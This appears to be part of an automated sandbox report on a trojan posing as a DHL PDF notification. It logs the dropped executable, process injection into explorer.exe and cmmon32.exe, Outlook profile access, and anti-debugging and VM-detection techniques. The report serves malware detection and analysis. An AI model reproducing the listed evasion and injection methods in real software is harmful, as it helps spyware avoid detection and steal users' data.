Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59560 NtWriteFile, 3_2_00A59560
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A596D0 NtCreateKey, 3_2_00A596D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59610 NtEnumerateValueKey, 3_2_00A59610
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59670 NtQueryInformationProcess, 3_2_00A59670
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59650 NtQueryValueKey, 3_2_00A59650
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59730 NtQueryVirtualMemory, 3_2_00A59730
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5A710 NtOpenProcessToken, 3_2_00A5A710
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59760 NtOpenProcess, 3_2_00A59760
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59770 NtSetInformationFile, 3_2_00A59770
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5A770 NtOpenThread, 3_2_00A5A770
Source: DHL_Notification_pdf.exe ReversingLabs: Detection: 53%
Source: DHL_Notification_pdf.exe Virustotal: Detection: 46%
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File read: C:\Users\user\Desktop\DHL_Notification_pdf.exe Jump to behavior
Source: DHL_Notification_pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DHL_Notification_pdf.exe C:\Users\user\Desktop\DHL_Notification_pdf.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe "C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process created: C:\Users\user\AppData\Local\Temp\ldndbi.exe C:\Users\user~1\AppData\Local\Temp\ldndbi.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File created: C:\Users\user~1\AppData\Local\Temp\nsw10F4.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/5@12/7
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Command line argument: A 1_2_00410940
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: DHL_Notification_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: ldndbi.exe, 00000003.00000002.292162847.00000000025E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ldndbi.exe, 00000001.00000003.250768478.000000001A020000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000001.00000003.250473705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ldndbi.exe, ldndbi.exe, 00000003.00000003.251325612.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000003.252803862.0000000000853000.00000004.00000020.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.0000000000B0F000.00000040.00001000.00020000.00000000.sdmp, ldndbi.exe, 00000003.00000002.290692933.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.291844113.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.289955771.000000000495A000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.509909068.0000000004DAF000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Unpacked PE file: 3.2.ldndbi.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00410AA4 push ecx; ret 1_2_00410AB7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041B1FB push esi; iretd 3_2_0041B1FC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040DAA5 push edi; retf 3_2_0040DAAE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041B369 push es; retf 3_2_0041B3A3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret 3_2_00422C7C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041C4AA push ecx; retf 3_2_0041C4AF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041BDCE push esp; ret 3_2_0041BDCF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401DF0 push eax; ret 3_2_00401DF2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00406F32 push C87026BFh; retf 3_2_00406F37
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A6D0D1 push ecx; ret 3_2_00A6D0E4
Drops PE files
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe File created: C:\Users\user\AppData\Local\Temp\ldndbi.exe Jump to dropped file
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 3384 Thread sleep time: -38000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A46A60 rdtscp 3_2_00A46A60
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 877 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 870 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.463061661.0000000007AFF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000002.517701971.0000000007B66000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1D
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
Source: explorer.exe, 00000004.00000000.259895150.0000000005EF4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000ED9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`p
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.263500910.0000000007BB1000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}813
Source: explorer.exe, 00000004.00000002.522931488.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.461873362.000000000F5CA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
Source: explorer.exe, 00000004.00000000.257744061.0000000003FB4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
Source: explorer.exe, 00000004.00000002.514828788.0000000005F12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_0040B0AF GetProcessHeap, 1_2_0040B0AF
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A46A60 rdtscp 3_2_00A46A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 mov eax, dword ptr fs:[00000030h] 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A590AF mov eax, dword ptr fs:[00000030h] 3_2_00A590AF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A4F0BF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A4F0BF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A4F0BF
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19080 mov eax, dword ptr fs:[00000030h] 3_2_00A19080
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h] 3_2_00A93884
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A93884 mov eax, dword ptr fs:[00000030h] 3_2_00A93884
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A158EC mov eax, dword ptr fs:[00000030h] 3_2_00A158EC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00AAB8D0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B02A mov eax, dword ptr fs:[00000030h] 3_2_00A2B02A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4002D mov eax, dword ptr fs:[00000030h] 3_2_00A4002D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h] 3_2_00AE4015
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE4015 mov eax, dword ptr fs:[00000030h] 3_2_00AE4015
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h] 3_2_00A97016
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h] 3_2_00A97016
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A97016 mov eax, dword ptr fs:[00000030h] 3_2_00A97016
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE1074 mov eax, dword ptr fs:[00000030h] 3_2_00AE1074
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD2073 mov eax, dword ptr fs:[00000030h] 3_2_00AD2073
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h] 3_2_00A30050
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A30050 mov eax, dword ptr fs:[00000030h] 3_2_00A30050
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h] 3_2_00A461A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A461A0 mov eax, dword ptr fs:[00000030h] 3_2_00A461A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A969A6 mov eax, dword ptr fs:[00000030h] 3_2_00A969A6
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A951BE mov eax, dword ptr fs:[00000030h] 3_2_00A951BE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A185 mov eax, dword ptr fs:[00000030h] 3_2_00A4A185
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3C182 mov eax, dword ptr fs:[00000030h] 3_2_00A3C182
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42990 mov eax, dword ptr fs:[00000030h] 3_2_00A42990
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A1B1E1
